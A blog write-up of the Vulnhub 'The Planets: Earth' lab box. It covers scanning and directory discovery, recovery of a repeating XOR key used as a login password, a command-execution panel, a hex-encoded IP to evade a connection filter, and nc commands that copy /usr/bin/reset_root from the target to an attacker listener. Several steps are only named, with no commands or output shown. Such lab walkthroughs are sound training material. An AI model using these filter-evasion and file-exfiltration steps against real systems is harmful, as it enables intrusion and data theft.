vulnhub-THE PLANETS EARTH
title: Vulnhub-THE PLANETS EARTH
tags: Vulnhub
abbrlink: d23a16db
date: 2022-10-07 09:07:46
Description
- Name: The Planets: Earth
- Date release: 2 Nov 2021
- Author: SirFlash
- Series: The Planets
- Difficulty: Easy
Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or feedback please email me at: SirFlash at protonmail.com, though it may take a while for me to get back to you.
nmap scan
Host discovery
IP scan
Modify hosts
Write in
Then visit
https://earth.local
and
https://terratest.earth.local
Visit
https://earth.local/
https://terratest.earth.local/
Directory scan
Visit
https://earth.local/admin/login
https://terratest.earth.local/robots.txt
- The last entry
testingnotes.*
Guessing that the extension is txt returns the following content - https://terratest.earth.local/testingnotes.txt
- https://terratest.earth.local/testdata.txt
Analysis (following someone else's writeup)
Previous Messages:
testdata.txt:
Someone else's Python code
Input:
Result:
- Hex decoding: https://www.sojson.com/hexadecimal.html
The decoded output is one string repeated over and over: earthclimatechangebad4humans
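The recovery step described above, as an added example (not the Python code from the original post, which is missing here). It assumes the messages are hex-encoded repeating-key XOR of a known plaintext; the sample plaintext is constructed in place of testdata.txt and the function names are hypothetical.

```python
"""Added example: known-plaintext recovery of a repeating XOR key."""
from itertools import cycle

# Key string taken from the page; the plaintext is a constructed stand-in
# for testdata.txt, and the XOR scheme itself is an assumption.
PAGE_KEY = b"earthclimatechangebad4humans"
SAMPLE_PLAINTEXT = (
    b"Constructed sample text standing in for testdata.txt. It only has to "
    b"be longer than the key so that the keystream visibly repeats."
)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key as often as needed."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def shortest_period(stream: bytes) -> bytes:
    """Return the shortest prefix that, repeated, reproduces stream."""
    for size in range(1, len(stream) + 1):
        unit = stream[:size]
        if all(stream[i] == unit[i % size] for i in range(len(stream))):
            return unit
    return stream


def recover_key(cipher_hex: str, known_plaintext: bytes) -> bytes:
    """XOR ciphertext with the known plaintext, then collapse the repeats."""
    cipher = bytes.fromhex(cipher_hex)
    n = min(len(cipher), len(known_plaintext))
    keystream = xor_bytes(cipher[:n], known_plaintext[:n])
    return shortest_period(keystream)


def demo() -> str:
    # Encrypt the way the application is assumed to: XOR, then hex-encode.
    cipher_hex = xor_bytes(SAMPLE_PLAINTEXT, PAGE_KEY).hex()
    return recover_key(cipher_hex, SAMPLE_PLAINTEXT).decode()


if __name__ == "__main__":
    print(demo())
```

Any plaintext published next to its ciphertext discloses a repeating XOR key in full, so such a key must never double as a login secret.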
This gives the username and password:
Logging in leads to a command execution interface
flag 1
- There are two flags in total, one under user and one under root
getshell
Remote connections are forbidden. According to others, convert the IP to hexadecimal.
http://www.metools.info/other/ipconvert162.html
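Privilege escalation
There is a reset_root that looks very suspicious
The nc command is used here; nc can be used to transfer files.
First, on Kali, run nc -nlvp 7788 >reset_root to start listening
In the target shell, run nc 192.168.169.220 7788 < /usr/bin/reset_root
Kali receives the data and saves it as reset_root.
- Use the strace tool to trace how the reset_root file runs; if it is not installed, download and install it.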